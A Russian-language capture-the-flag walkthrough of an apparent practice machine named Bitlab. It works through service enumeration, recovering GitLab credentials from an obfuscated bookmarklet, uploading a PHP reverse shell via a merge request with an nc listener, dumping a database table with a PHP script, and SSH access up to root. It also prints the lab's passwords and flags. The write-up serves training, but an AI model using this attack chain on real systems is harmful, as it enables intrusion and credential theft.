Обзор сервисов
$ nmap -sC -sV -sT -Pn -p- -v -oN nmap 10.10.10.114
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
| 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp closed http
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Gobuster:
gitlab
http://10.10.10.114/users/sign_in
profile
http://10.10.10.114/profile/
help
http://10.10.10.114/help/
Gitlab Login
=> копируем gitlab login
javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()
=>
(function() {
var _0x4b18 = ["value", "user_login", "getElementById", "clave", "user_password", "11des0081x"];
document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]] = _0x4b18[3];
document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]] = _0x4b18[5];
})()
=> clave:11des0081x
PostgreSQL
http://10.10.10.114/snippets/1
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
=> developer роль => можно модифицировать файлы => коммитим => мержим:
=> добавляем новый файл => shell.php
=> копируем шелл из revshell.com => одобряем merge request.
nc -lnvp 1234
curl http://10.10.10.114/profile/shell.php
Пользователь
<?php
// Dumps every row of the local "profiles" table using the credentials
// found in the GitLab snippet (host=localhost dbname=profiles user=profiles
// password=profiles). The connection string is split over two lines in the
// original file; pg_connect keyword=value pairs are whitespace-separated,
// so the embedded newline is accepted as a separator.
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles
password=profiles");
// Fetch all columns of all rows, then print the result as a PHP array.
$result = pg_query($db_connection, "SELECT * FROM profiles");
print_r(pg_fetch_all($result));
?>
$ echo PD9waHAKJGRiX2Nvbm5lY3Rpb24gPSBwZ19jb25uZWN0KCJob3N0PWxvY2FsaG9zdCBkYm5hbWU9cHJvZmlsZXMgdXNlcj1wcm9maWxlcwpwYXNzd29yZD1wcm9maWxlcyIpOwokcmVzdWx0ID0gcGdfcXVlcnkoJGRiX2Nvbm5lY3Rpb24sICJTRUxFQ1QgKiBGUk9NIHByb2ZpbGVzIik7CnByaW50X3IocGdfZmV0Y2hfYWxsKCRyZXN1bHQpKTsKPz4K | base64 -d > pg.php
$ php pg.php
Array
(
[0] => Array
(
[id] => 1
[username] => clave
[password] => c3NoLXN0cjBuZy1wQHNz==
)
)
=> clave:ssh-str0ng-p@ss
$ ssh clave@10.10.10.114
c3NoLXN0cjBuZy1wQHNz==
Флаг пользователя
clave@bitlab:~$ cat user.txt
1e3fd81ec3aa2f1462370ee3c20b8154
Повышение привилегий
clave@bitlab:~$ ls -la
total 44
drwxr-xr-x 4 clave clave 4096 Aug 8 2019 .
drwxr-xr-x 3 root root 4096 Feb 28 2019 ..
lrwxrwxrwx 1 root root 9 Feb 28 2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave 3771 Feb 28 2019 .bashrc
drwx------ 2 clave clave 4096 Aug 8 2019 .cache
drwx------ 3 clave clave 4096 Aug 8 2019 .gnupg
-rw-r--r-- 1 clave clave 807 Feb 28 2019 .profile
-r-------- 1 clave clave 13824 Jul 30 2019 RemoteConnection.exe
-r-------- 1 clave clave 33 Feb 28 2019 user.txt
=> RemoteConnection.exe
=> скачиваем файл и реверсим его с помощью IDA или Ghidra => root:Qf7]8YSV.wDNF*[7d?j&eD4^
$ ssh root@10.10.10.114
Qf7]8YSV.wDNF*[7d?j&eD4^
Флаг суперпользователя
root@bitlab:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b9:6f:4e brd ff:ff:ff:ff:ff:ff
inet 10.10.10.114/24 brd 10.10.10.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:6f4e/64 scope global dynamic mngtmpaddr
valid_lft 86194sec preferred_lft 14194sec
inet6 fe80::250:56ff:feb9:6f4e/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:3e:a9:22:d3 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: br-c8b1f0816703: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:05:0c:80:86 brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-c8b1f0816703
valid_lft forever preferred_lft forever
inet6 fe80::42:5ff:fe0c:8086/64 scope link
valid_lft forever preferred_lft forever
6: vethb1906a4@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c8b1f0816703 state UP group default
link/ether ea:3d:dc:08:b5:e5 brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::e83d:dcff:fe08:b5e5/64 scope link
valid_lft forever preferred_lft forever
8: veth692e1a6@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c8b1f0816703 state UP group default
link/ether 52:a4:98:2d:51:fb brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::50a4:98ff:fe2d:51fb/64 scope link
valid_lft forever preferred_lft forever
10: vethf7f0047@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c8b1f0816703 state UP group default
link/ether ba:14:10:51:8a:e7 brd ff:ff:ff:ff:ff:ff link-netnsid 2
inet6 fe80::b814:10ff:fe51:8ae7/64 scope link
valid_lft forever preferred_lft forever
12: vethf1e2fb0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c8b1f0816703 state UP group default
link/ether f6:ca:39:14:3a:5e brd ff:ff:ff:ff:ff:ff link-netnsid 3
inet6 fe80::f4ca:39ff:fe14:3a5e/64 scope link
valid_lft forever preferred_lft forever
root@bitlab:~# id
uid=0(root) gid=0(root) groups=0(root)
root@bitlab:~# ls
root.txt
root@bitlab:~# cat root.txt
8d4cc131757957cb68d9a0cddccd587c